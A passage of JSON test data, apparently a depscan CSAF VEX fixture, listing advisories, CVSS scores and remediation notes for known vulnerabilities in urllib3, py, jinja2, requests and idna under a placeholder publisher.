requests. * Not using the `Cookie` header.  ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}, "common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion  The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.  The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.  ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.  From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):  > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.  ## Affected usages  Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.  Both of the following conditions must be true to be affected by this vulnerability:  * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.  ## Remediation  You can remediate this vulnerability with any of the following steps:  * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.   ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.  Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.  ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.  * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.  ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.  ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7.  ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.  ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb  ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects  When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.  However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.  Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.  Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.  ## Remediation  * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", 